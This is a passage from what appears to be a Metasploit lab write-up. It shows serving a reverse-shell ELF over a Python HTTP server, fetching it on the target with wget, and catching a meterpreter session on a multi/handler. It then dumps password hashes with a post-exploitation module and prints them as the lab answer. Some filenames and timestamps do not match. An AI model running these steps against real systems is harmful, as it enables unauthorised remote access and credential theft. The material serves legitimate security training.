The first payload I created didn't work, so I used the venom builder at https://pentest.ws/tools/venom-builder to get the exact syntax used above and the msfconsole launch command.
No Answer
Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).
On the Kali machine:
root@ip-10-10-196-135:~/Desktop/msexploit# nano pyserver.py
import http.server
import socketserver

# Port the target's wget points at (the server output below reports 9000).
PORT = 9000
# Serve the current directory, where shell.elf was written, over plain HTTP.
Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("serving at port", PORT)
    httpd.serve_forever()
root@ip-10-10-196-135:~/Desktop/msexploit# python3 pyserver.py
serving at port 9000
10.10.55.92 - - [26/Sep/2021 10:37:52] "GET /rev_shell2.elf HTTP/1.1" 200 -
In the target SSH session:
root@ip-10-10-55-92:/tmp# wget http://10.10.196.135:9000/shell.elf
--2021-09-26 09:53:50-- http://10.10.196.135:9000/shell.elf
Connecting to 10.10.196.135:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘shell.elf’
shell.elf 100%[==============================================>] 207 --.-KB/s in 0s
2021-09-26 09:53:50 (12.6 MB/s) - ‘shell.elf’ saved [207/207]
No Answer
Get a meterpreter session on the target machine.
On the Kali machine:
root@ip-10-10-196-135:~/Desktop/msexploit# msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 10.10.196.135; set LPORT 7777; run"
On the target machine:
root@ip-10-10-55-92:/tmp# chmod +x rev_shell2.elf
root@ip-10-10-55-92:/tmp# ./rev_shell2.elf
On Kali we get a meterpreter session:
[...]
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2048 exploits - 1105 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: You can use help to view all available commands
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
LHOST => 10.10.196.135
LPORT => 7777
[*] Started reverse TCP handler on 10.10.196.135:7777
[*] Sending stage (980808 bytes) to 10.10.55.92
[*] Meterpreter session 1 opened (10.10.196.135:7777 -> 10.10.55.92:54228) at 2021-09-26 10:56:30 +0100
meterpreter >
No Answer
Use a post exploitation module to dump hashes of other users on the system.
We can use the post/linux/gather/hashdump module, found with Metasploit's search command:
meterpreter >
Background session 1? [y/N] y
[-] Unknown command: y.
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux no-user @ ip-10-10-55-92 (uid=0, gid=0, euid=0, egid=0) @ ip-10-10-55-92.eu-w... 10.10.196.135:7777 -> 10.10.55.92:54228 (10.10.55.92)
msf5 exploit(multi/handler) > use linux/gather/hashdump
msf5 post(linux/gather/hashdump) > show options
Module options (post/linux/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run
[+] murphy:$6$qK0Kt4UO$HuCrlOJGbBJb5Av9SL7rEzbxcz/KZYFkMwUqAE0ZMDpNRmOHhPHeI2JU3m9OBOS7lUKkKMADLxCBcywzIxl7b.:1001:1001::/home/murphy:/bin/sh
[+] claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20210926110318_default_10.10.55.92_linux.hashes_221290.txt
[*] Post module execution completed
No Answer
What is the other user’s password hash?
Answer :
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
TASK 7 : Summary
No answer needed.
No Answer